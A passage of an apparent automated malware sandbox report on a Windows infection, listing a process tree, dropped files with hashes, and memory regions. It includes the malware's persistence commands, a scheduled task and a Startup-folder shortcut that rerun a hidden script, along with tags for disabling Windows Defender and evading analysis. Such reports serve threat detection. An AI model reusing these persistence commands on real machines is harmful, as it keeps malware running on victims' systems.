                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5604 -childID 5 -isForBrowser -prefsHandle 5648 -prefMapHandle 5656 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ac60805-86da-48ba-a626-8ce064f11cb5} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab
                                  7⤵
                                    PID:8916
                            • C:\Users\Admin\AppData\Local\Temp\10148420101\1abbe437ef.exe
                              "C:\Users\Admin\AppData\Local\Temp\10148420101\1abbe437ef.exe"
                              4⤵
                              • Modifies Windows Defender DisableAntiSpyware settings
                              • Modifies Windows Defender Real-time Protection settings
                              • Modifies Windows Defender TamperProtection settings
                              • Modifies Windows Defender notification settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3544
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
                          2⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          PID:4912
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
                            3⤵
                            • System Location Discovery: System Language Discovery
                            • Scheduled Task/Job: Scheduled Task
                            PID:2136
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit
                          2⤵
                          • Drops startup file
                          • System Location Discovery: System Language Discovery
                          PID:2100
                      • C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\javaw.exe
                        C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\javaw.exe -jar C:\Users\Admin\AppData\Roaming\Suh\niga.jar
                        1⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:2476
                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2420
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 7032 -ip 7032
                        1⤵
                          PID:5744
                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                          1⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:7320

                        Network

                        MITRE ATT&CK Enterprise v15

                        Downloads


                          SHA512

                          68e05a885e0ebf648a1bfebc9ee2567a63456fcb9c169dd1b86296b4fa2bbd15e5f042d3fbe7ce0f9e806b3808fa9d8ec42e8461c4cba95fba400819a17a3641

                        • C:\Users\Admin\AppData\Local\Temp\Digital

                          Filesize

                          50KB

                          MD5

                          2d6310a2667f96c2f507df10b2864ef1

                          SHA1

                          1f87373d050a63c40da74e6b5282854de8e4b6d1

                          SHA256

                          44f9725e324c4608d1765bea31227970723219dd1e8616a8c6d7701a0d4e4cfe

                          SHA512

                          92e3d89de812163f8cdc5f9e2664b5ab1350361475af82c40934e583730ec5eea8d87fd70f5b30a3fb4501633282b8c41e94b903817d9268a23e8bf5e3c4b6ae

                        • C:\Users\Admin\AppData\Local\Temp\Dimension.msi

                          Filesize

                          62KB

                          MD5

                          18e6e3ba56a6c0dab2af5476fc9c30ae

                          SHA1

                          41f98651e2469588ec410bb84fe9ac665be23e58

                          SHA256

                          2fddcec8c3e371f060c52a0a5e2b15fd182cc0fb4a1774987492df1f07831767

                          SHA512

                          65cc7397e9e473545192e7839469d504e444bc6d20108994cf78dd1ff700225b48e2697c610df4f922d7bea9568bbb09afb14df6ba050962eb9a9604422d6418

                        • C:\Users\Admin\AppData\Local\Temp\Drug.msi

                          Filesize

                          64KB

                          MD5

                          19bc557889ce597b75fd80fa52e9a7cf

                          SHA1

                          cf56088fef7ff8117b01b5963453932f4cd095c8

                          SHA256

                          07652ced977e85a1beeab92e61dd2f234ab979c84a831f434ae7ffd0791c4f96

                          SHA512

                          b8f84391d43a42856d4af4c725b664f129d8f0b3c0bddc6e5973ddae7b0dd4115ac0d90a034a095bd59cf7923a1c5cd35c214a2ff21d0fa68ca071600aeaab19

                        • C:\Users\Admin\AppData\Local\Temp\Foul

                          Filesize

                          120KB

                          MD5

                          7037249b40cd9225d479aa89cc32d350

                          SHA1

                          dfd3c0bf34aaabe99665717760581bcb25118b03

                          SHA256

                          d86dd3042e1264a62ee5dc97b64e556455aa891522805efc86ef415bfd5dcc47

                          SHA512

                          3a1288c26827bf82b6a7795f10cc2de2a88c508bad5e4bbb058295cee31132e039d8e5fbcd851984fd3c48fa6088d0d1326362c85da4b32c3b26924288bf4f27

                        • C:\Users\Admin\AppData\Local\Temp\Fraud

                          Filesize

                          65KB

                          MD5

                          a435516be9391d7fd1eb829af528dd7a

                          SHA1

                          f83eb48e351078ae5ec91ad160954a9f0543810b

                          SHA256

                          bb2f851913ffb6db2d7fbe172327d7bdc3eecd8d010406300c3de172bcc0e77f

                          SHA512

                          7453f2024263cfa95acc06838f82f2abecf693a112fab09882cb47824313c9be71ba222528f5d9064928ad632d840bc1d8a5ad7419576220b827451a402b2695

                        • C:\Users\Admin\AppData\Local\Temp\Gross

                          Filesize

                          106KB

                          MD5

                          b99e826f053f4025614a8a23f5b09a01

                          SHA1

                          eca3926a832f8589777062b984933b468d56b39e

                          SHA256

                          89bdf43b61363dca0ed9948d31583df2e901544f60031c104399eb628c562402

                          SHA512

                          d6f9f50580603839c2a2a8ef630d14905569bc9444733cf648dd7e1cf0b4318345b572d4c57ddb810345290428fa7c877dc34b652ff4ec98cd4f6d2d85115946

                        • C:\Users\Admin\AppData\Local\Temp\Having.msi

                          Filesize

                          67KB

                          MD5

                          5bc3aab06e4075325cd03a9103db3177

                          SHA1

                          65b4ccb68dc684bb0223a2c18af465c84b3e4ce3

                          SHA256

                          0744b72dae8ff4c3fc7769a14b54219cfb8a2dc5307d07b27f47710f5c0aad32

                          SHA512

                          11d034638cf7a8425c909ca63fb0a31e886d99edb4b87254937885dc3ea2bbf5b815dae59a2c39b8863da778e014e815384a1d58c6fc8042bc3a253c4187f402

                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs

                          Filesize

                          15KB

                          MD5

                          f4966903836111437b1bcb75bcfc19e4

                          SHA1

                          c79a7c0271c0e65e1b6211f793ed2264e9431d16

                          SHA256

                          572e616fdaa6129d659974b3fee9296c6f75dec475e74dc560a38961926d7621

                          SHA512

                          e97ec05627d009edc7c3400505f13235c37e060ca2a9003af3cea8c21e9e2f4e208a6a2bc433a7b0d4b7ff6e5db3005e1c06e56055a8ccfa5b6084f3490b2c60

                        • C:\Users\Admin\AppData\Local\Temp\Invisible

                          Filesize

                          133KB

                          MD5

                          06a296e304d497d4deb3558292895310

                          SHA1

                          a67054c6deacd64e945d116edf9b93026325b123

                          SHA256

                          201a44d3c39b7a5abdf9d9abd4444208de7b0e393c8531d703e49daa545047be

                          SHA512

                          5a4de3fcc05d078d405b7ecb95ba379a5d07af36c5dfe10f8b0fa31d83dfacdf0a7882de050fb0025a22c6450b53d8c8900b0062ba660d0f36c9553c0a9d25e1

                        • C:\Users\Admin\AppData\Local\Temp\Kate

                          Filesize

                          129KB

                          MD5

                          edae0cf0a65002993fe53ab53a35e508

                          SHA1

                          9e0692e7d47112d7d33e07251299801afd79258a

                          SHA256

                          dd32de9fc80813b4ce2d6d03179a0fec47f43116e8554e8a37832bbe6fadd738

                          SHA512

                          57fe876f78b4d66e33864e5a6388a4d3e4c00532ecf9197d9843ab356d4359568a99c1cfb9c118a4953f09e85003fd592ef34f22cc7be31b29c1121da6a62c86

                        • C:\Users\Admin\AppData\Local\Temp\Opens.msi

                          Filesize

                          90KB

                          MD5

                          47e463311575ead32ee26e357f0a0052

                          SHA1

                          a227eba1974ed7495f132dbb97640fe711bdd1b8

                          SHA256

                          47ede1b0f7c630ea51bd51640366dc094a8dea5050032d84406e5a9de64dc83f

                          SHA512

                          a9fb84d8c8e0e3be3640eb515f7c99448257e0a0130ba97e167a9278cdf1b0fde34205f22e4ed4bbd4afda757d9afce09cad81c9c32bd108e92fcd94fd2485e5

                        • C:\Users\Admin\AppData\Local\Temp\Responding.msi

                          Filesize

                          89KB

                          MD5

                          eee6e4b2324d16c7537b650b67f404c1

                          SHA1

                          124897937646ef51c04697901eea8f1b9df3be47

                          SHA256

                          9948270c9d90d4bede7e4a979b820beb6e38d8292fe95aabd7c908cb44dc077f

                          SHA512

                          c1119cfa02a7cf9c74654064dc0bac6830efbf71820eaf21714fedec17afc532ad865c936dd68e7f69d477c5809960ec5fb280420f0dfd1e36aff7635f81fc2e

                        • C:\Users\Admin\AppData\Local\Temp\Salem.msi

                          Filesize

                          37KB

                          MD5

                          3b0b2b1cc0756f71ea52fc4e53c1b6f1

                          SHA1

                          b43b68ed8a7628152cfd1a741cdf76a77592f0a7

                          SHA256

                          5e6da65939db0383d8ee0483186a43f0dc2a878be426a0f4b1cd30e3b10fc67d

                          SHA512

                          3eb7e6857dc44c87adbcc976fed74fe82ce07e1e647c50700f6d97c037942755cc31ef1fb9ee12f379c6f4619214c900e51736ff6f245b4ee39eed50504ab8d4

                        • C:\Users\Admin\AppData\Local\Temp\Series.msi

                          Filesize

                          80KB

                          MD5

                          74a72eedf34baf3ab6c6339fe77eab79

                          SHA1

                          73865bc161df56e20582f05f804e0a531f7ccb9f

                          SHA256

                          08dc77c3985e2bbea8dbe9c67d45a619ca071000de91576f1d87541220593838

                          SHA512

                          669e838263e056cab6e3e70e6abd814fb20196e6331c2dcbf5fcda04f82b49c032943ae005aa39b3f8baf51db4071643197db36e16482967c93ac81d494ad6ed

                        • C:\Users\Admin\AppData\Local\Temp\Snowboard

                          Filesize

                          58KB

                          MD5

                          f7317b5aebfad11fe98206f4848b9cd9

                          SHA1

                          ac27eb76fcb8a4ce9e40350113c7b00b880dfbec

                          SHA256

                          e86ec279bd864f26e5de96adb095b6a6eac223c7c7e0334e4fd1ff7d5ed9a3ad

                          SHA512

                          5eb3731c074f7fd75a5cf018879a242a552cb82cf27f1c45e0d6e05749720de9abd2de8bbf96b3ffbbb8812f3d25111760df8b7836aa420424c55bcfef3e9a33

                        • C:\Users\Admin\AppData\Local\Temp\Tells

                          Filesize

                          143KB

                          MD5

                          106fdb323c48de2f4d541001a6c71b23

                          SHA1

                          5d2df1a8f8e71a12ae1a367c2c6f43720449efc0

                          SHA256

                          9bbb2643cbc5e9dda6511bcc9f7293c0a03ed741cfdb699fdf503cb3282ee704

                          SHA512

                          00e0b299800f66e7d624479784324bf4854674c92708d2de5890b430a7d961102d5f5720f55fd426782ffa5ddd6617e01f6d13383dd490c1eac62895253dcb89

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3kyiqa5x.4ak.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\ae.msi

                          Filesize

                          18KB

                          MD5

                          2fe473cb6184e1a5bb0fcde9228e7b6d

                          SHA1

                          5043cffbbea46ce7dcd6c12f6ebca5154919b5c6

                          SHA256

                          371b62ac2c1cf601ae6c45d88f31947625ef7593b136cae43f936a43b18548f9

                          SHA512

                          492619923441b9623b01985c7cd6da824baba065d0c7e92b5f38681db33f7aca071bd03cb0ffa9d189a99d956e715b1a92c1d89bda1267bbd9eca1f1255c8e5e

                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

                          Filesize

                          1.9MB

                          MD5

                          5b1dbccb1977e33fae7e0efa78e96b49

                          SHA1

                          fd97d5e5080b0130e21f998ed33b47997dd87d84

                          SHA256

                          c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77

                          SHA512

                          62de874632c6900b307c1fe3b3bfc00de88a3b80311d0c2746a71f53899f20eb658a944fd4e29d80a1af8e25695e61d913f64fc3b035fb7d78c8e7be13ca13a8

                        • C:\Users\Admin\AppData\Local\Temp\micE72.tmp.exe

                          Filesize

                          262KB

                          MD5

                          36105cc7aff011ef834f9e83717f9ab1

                          SHA1

                          9b5a1a9da2f1e22ae23517c45b82c734a5793ded

                          SHA256

                          36263b9d2418efa92ba637974cfed268437354d88be78814354c5d47337890c2

                          SHA512

                          38662724ed70d768ff19ed260f17593a956858ee5aedd4d4178f895bf3ca39181983d8310acc6aa203223518fa7394e64829832b380121a86360120aab66ba50

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\AlternateServices.bin

                          Filesize

                          7KB

                          MD5

                          f63d87925f6df19ee1276b79cfddfb8b

                          SHA1

                          251b8896d0ff1cdd7f8d2d8e9fb76fab3f83b0c7

                          SHA256

                          7efcb412072dcf2914f7f8e7f465ed11c433d81f0b4f80dd50f28696139b38ca

                          SHA512

                          91b37e76025542075ddce66d0078074b56c8bfa1f0e5a28bd2ca71a5c8a5cc0401ce10171117430f4cfc4552953838601401de6ea334a94fca722f4123066b33

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\AlternateServices.bin

                          Filesize

                          10KB

                          MD5

                          75ad8ac095551bcbb14560042459470d

                          SHA1

                          0e8160f547e997a5f2e5d0770681f3b55565fef2

                          SHA256

                          d1dd219c348d20246536d46fc76c4319b4a627165a16c2d2777fbd5914a7a776

                          SHA512

                          5539c01afe0f1c4c1bc3dc0312b25afc810ec4c83a64114b02a6d35812a5858590c03be8e80a25b00ef29120276fa3e63f0bf82ca05a6ff0577bf0b461e4cb0b

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp

                          Filesize

                          22KB

                          MD5

                          a04061a9827dbc604a2474bcd7274885

                          SHA1

                          9a9e6c73e4e89c165685ff4121e7f68b19eed6a9

                          SHA256

                          516db88c47b2258e9d1f64db076dbb21121bf63fe3d6548ef6b8e5c8b5c7b984

                          SHA512

                          303d10dc8e7ebb290f6c7ae7a438b2e78d996225a1eb0f295fbc22736c31ae7374316300045a6c9664e753f299c5839d341097f7e7cd5a47a18f7502afc8523e

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp

                          Filesize

                          21KB

                          MD5

                          ad68a41c61b706f0636740b7dc679553

                          SHA1

                          3dc2a70de4acad0cd0cf1a247b1f71ce9ab8d253

                          SHA256

                          db6c0e7b66f1f7c14726d1426a0f9b1e8f9f54d3a3e5afa86c5d314f5e7336ac

                          SHA512

                          6d14715e1f863712dac8fc791fcdedbeffb84da6f59e989fce63d80918be559df7567080bba31619bd37b0bc2e596cf00a4aecf776715c664e4458e9d920901e

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\1e773d3d-1ee8-4156-81c2-3ffd6d782a61

                          Filesize

                          659B

                          MD5

                          95c593725cde3fea6dec7d7fcfa23d31

                          SHA1

                          0e21490e0ea6b04609dd85a4c3dc702f943f2d14

                          SHA256

                          a019d82581e88664b515d6137277120670dede72066a54e89cec9b1e9cfd3656

                          SHA512

                          2ac60cf416686cb21db0fcd0523fdb32ea29bdc83f88298c91b1edf9d52986ce11a2a785130caf4b752f037ac2a0ed67e69c136686b6364b8daabf0f6fbc0bec

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\2f6aa388-d62f-4278-9c5a-291a54bb4311

                          Filesize

                          982B

                          MD5

                          ebd900ac0e4705709590dde692b5fafd

                          SHA1

                          89f9d3ec088783ab6407a9a839011b554eab39ad

                          SHA256

                          4e0f0ddfd7e7fbc0e086856f5733d6606e637e66be48f09126c4f1bd6e9f6ade

                          SHA512

                          440a6ab308e7b02a2e129bbfc3880759ecfec6eadd2a506103854086ba91ead3c51b0b79f1752b48b1b2049005b28c87c27e57ad23ec5d274ede7aa02d468627

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\prefs.js

                          Filesize

                          10KB

                          MD5

                          b95f03afb48319544dd8fd5c716941e5

                          SHA1

                          5911f4f5f9e67811878f4d0e110489bf5c570af7

                          SHA256

                          0bd1a9c35b95b295cf6362599fd2e271f4156d109c0529aa501623ebbc4ccd0f

                          SHA512

                          4746a0b14ef06f8b13ade27eb938e04b14d02fd3dd4af02f2fe4d80a65b7d3da8fe0d1f6fbe28dba0b46cb5ea84ee2d2f89ab6a9efdeb9358d93bf3baf5504c5

                        • C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\java.dll

                          Filesize

                          118KB

                          MD5

                          8a909cd9cf20fac2d4cd8b8cab595318

                          SHA1

                          9a7af0cb403947474a4e386d58d048dd4dd93d3b

                          SHA256

                          c7f9ddaf905d17031868637caa67e5d734dbb0a8b1eb9c95683f28bb98ff15ca

                          SHA512

                          985d15c9828e92af7144bf4e00d0e5ad9e04c7ebbc09116842fd3b07898e1d3a148c69680ad432d8658ebc5e25dca24e7213ad74a582d326a6fce1d498f1192b

                        • C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\javaw.exe

                          Filesize

                          53KB

                          MD5

                          e52510a937f1e020bca7a13c2507d689

                          SHA1

                          cab99aa8cb7c7b301db90f929ec89d131d7b6e2b

                          SHA256

                          77c3018679250112bdec95529ffb6da3d715a2326b78403bfad185c4026b9043

                          SHA512

                          d211b6b72fd2a36066d716786623fc4aa32ba315dcb42b4111691f6726c42825c122573732fd2471a3a58695fe7b3e4a5852846ab6a765ffbdfb35bc70a9c324

                        • C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\jimage.dll

                          Filesize

                          32KB

                          MD5

                          0cb44dad99240f07c6febbab37a06f24

                          SHA1

                          fed1d830fe6c79877dd3a2ae636c35b2b2249dfa

                          SHA256

                          2ab25be2a3896bed02a125fdba410a8c497021de603038ed0d7516d6f132e566

                          SHA512

                          f67b773788a898cc8ee53b043b09d5be38e0d7af9e6959d902c25e347134b0268c7da4db00ff7662fd7825c91eb26a7e097dc37709460e1e5d4467c03c3e797d

                        • C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\jli.dll

                          Filesize

                          89KB

                          MD5

                          1a96e9d67a200141c55b181c4da92db9

                          SHA1

                          259856b21d0360e925e05a23208f8722fe609d1b

                          SHA256

                          d7ed92324abe68d64ca9051adb9831d5f43c69cc75a973ebdec541d80175aae8

                          SHA512

                          fb036d326407c48864582d0fdabc9e7e8c5fa6177888ef50b7fdca6f50bf38a122b6124fd3ce41b2b88a76f72c641558e3d1db3f5962a4d39b3b38b140f45924

                        • C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\msvcp140.dll

                          Filesize

                          564KB

                          MD5

                          1ba6d1cf0508775096f9e121a24e5863

                          SHA1

                          df552810d779476610da3c8b956cc921ed6c91ae

                          SHA256

                          74892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823

                          SHA512

                          9887d9f5838aa1555ea87968e014edfe2f7747f138f1b551d1f609bc1d5d8214a5fdab0d76fcac98864c1da5eb81405ca373b2a30cb12203c011d89ea6d069af

                        • C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\server\classes.jsa

                          Filesize

                          12.9MB

                          MD5

                          18d38c8f8868190ecbb7c92dfba370ea

                          SHA1

                          7966091904ae2003992235a2dc341131d9041034

                          SHA256

                          3e439b8c17cbdddc48fd1b4ae92d6e48a52ba6243ba44002728cb21fc5cee4dc

                          SHA512

                          eb6b1b196b415b9cbba5a9ce9f0b722ab97bae28e4a68147cc2d75188bfae9b87a3e29e1696e250a96ec99bd906567775caa8aa0fb446881fe82affc76a04b66

                        • C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\server\jvm.dll

                          Filesize

                          12.7MB

                          MD5

                          9ef91a9a1477faaa998599f2be091c55

                          SHA1

                          5fedda722d6d9d0a2a977721138e89a2a71924e4

                          SHA256

                          d3439ed380cab78f97f10617299281b1c36ab67fdae21f8f963ddb187ee06ea7

                          SHA512

                          82caeb40025e4d7b1c3cb83890560d3e08f420d0b92d4b7a93a9d5c76d265c51cba1143fc8d587b78e63dcfbc21aabb6c422f886caf9e4ab8286dff408d51c95

                        • C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\vcruntime140.dll

                          Filesize

                          106KB

                          MD5

                          49c96cecda5c6c660a107d378fdfc3d4

                          SHA1

                          00149b7a66723e3f0310f139489fe172f818ca8e

                          SHA256

                          69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

                          SHA512

                          e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

                        • C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\vcruntime140_1.dll

                          Filesize

                          48KB

                          MD5

                          cf0a1c4776ffe23ada5e570fc36e39fe

                          SHA1

                          2050fadecc11550ad9bde0b542bcf87e19d37f1a

                          SHA256

                          6fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47

                          SHA512

                          d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168

                        • C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\legal\java.desktop\COPYRIGHT

                          Filesize

                          35B

                          MD5

                          4586c3797f538d41b7b2e30e8afebbc9

                          SHA1

                          3419ebac878fa53a9f0ff1617045ddaafb43dce0

                          SHA256

                          7afb3a2dc57cb16223dddc970e0b464311e5311484c793abf9327a19ef629018

                          SHA512

                          f2c722ae80d2c0dcdb30a6993864eb90b85be5311261012d4585c6595579582d1b37323613f5417d189adcd096fa948e0378c1e6c59761bf94d65c0a5c2f2fd3

                        • C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\legal\java.desktop\LICENSE

                          Filesize

                          33B

                          MD5

                          16989bab922811e28b64ac30449a5d05

                          SHA1

                          51ab20e8c19ee570bf6c496ec7346b7cf17bd04a

                          SHA256

                          86e0516b888276a492b19f9a84f5a866ed36925fae1510b3a94a0b6213e69192

                          SHA512

                          86571f127a6755a7339a9ed06e458c8dc5898e528de89e369a13c183711831af0646474986bae6573bc5155058d5f38348d6bfdeb3fd9318e98e0bf7916e6608

                        • C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\lib\jvm.cfg

                          Filesize

                          29B

                          MD5

                          7ce21bdcfa333c231d74a77394206302

                          SHA1

                          c5a940d2dee8e7bfc01a87d585ddca420d37e226

                          SHA256

                          aa9efb969444c1484e29adecab55a122458090616e766b2f1230ef05bc3867e0

                          SHA512

                          8b37a1a5600e0a4e5832021c4db50569e33f1ddc8ac4fc2f38d5439272b955b0e3028ea10dec0743b197aa0def32d9e185066d2bac451f81b99539d34006074b

                        • C:\Users\Admin\AppData\Roaming\Suh\niga.jar

                          Filesize

                          1.4MB

                          MD5

                          c2eaf7f27279e855ce4fb6e28b1a9257

                          SHA1

                          da9d48af66f70393b0967886fa098e3a97f0d3fe

                          SHA256

                          7854f78de36e7ba1280434f6a6fc48015d2d7d89dc6bd665a717951ece83bb60

                          SHA512

                          cd9df4fc586d6efaf76f45023f4ae4d5d3b2bc765b0b24c73d84c9d7c5e616758f834f3278071985d545d4ae8ae381b3ff7c7abacda198966c5e07dd487f277a

                        • memory/1608-1668-0x0000000000610000-0x0000000000ACA000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/1608-3642-0x0000000000610000-0x0000000000ACA000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/1720-1291-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-55-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-1073-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-211-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-1516-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-54-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-1165-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-22-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-174-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-53-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-21-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-20-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-19-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-1422-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-18-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1720-50-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1968-5-0x0000000000DA0000-0x0000000001282000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1968-16-0x0000000000DA0000-0x0000000001282000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1968-3-0x0000000000DA0000-0x0000000001282000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1968-0-0x0000000000DA0000-0x0000000001282000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/1968-2-0x0000000000DA1000-0x0000000000DCF000-memory.dmp

                          Filesize

                          184KB

                        • memory/1968-1-0x0000000077DE4000-0x0000000077DE6000-memory.dmp

                          Filesize

                          8KB

                        • memory/2084-1517-0x0000000000880000-0x0000000000D3A000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2084-1524-0x0000000000880000-0x0000000000D3A000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2420-1107-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/2420-1120-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/3020-1277-0x00000000061E0000-0x00000000061FE000-memory.dmp

                          Filesize

                          120KB

                        • memory/3020-1259-0x00000000028A0000-0x00000000028D6000-memory.dmp

                          Filesize

                          216KB

                        • memory/3020-1509-0x0000000008760000-0x0000000008D04000-memory.dmp

                          Filesize

                          5.6MB

                        • memory/3020-1287-0x0000000006720000-0x000000000673A000-memory.dmp

                          Filesize

                          104KB

                        • memory/3020-1286-0x0000000007B30000-0x00000000081AA000-memory.dmp

                          Filesize

                          6.5MB

                        • memory/3020-1507-0x00000000076D0000-0x0000000007766000-memory.dmp

                          Filesize

                          600KB

                        • memory/3020-1508-0x0000000007630000-0x0000000007652000-memory.dmp

                          Filesize

                          136KB

                        • memory/3020-1278-0x0000000006220000-0x000000000626C000-memory.dmp

                          Filesize

                          304KB

                        • memory/3020-1275-0x0000000005E00000-0x0000000006154000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/3020-1264-0x0000000005B00000-0x0000000005B66000-memory.dmp

                          Filesize

                          408KB

                        • memory/3020-1263-0x0000000005A60000-0x0000000005A82000-memory.dmp

                          Filesize

                          136KB

                        • memory/3020-1261-0x0000000005430000-0x0000000005A58000-memory.dmp

                          Filesize

                          6.2MB

                        • memory/3544-6863-0x00000000006B0000-0x00000000012C8000-memory.dmp

                          Filesize

                          12.1MB

                        • memory/3544-7579-0x00000000004D0000-0x0000000000942000-memory.dmp

                          Filesize

                          4.4MB

                        • memory/3544-7580-0x00000000004D0000-0x0000000000942000-memory.dmp

                          Filesize

                          4.4MB

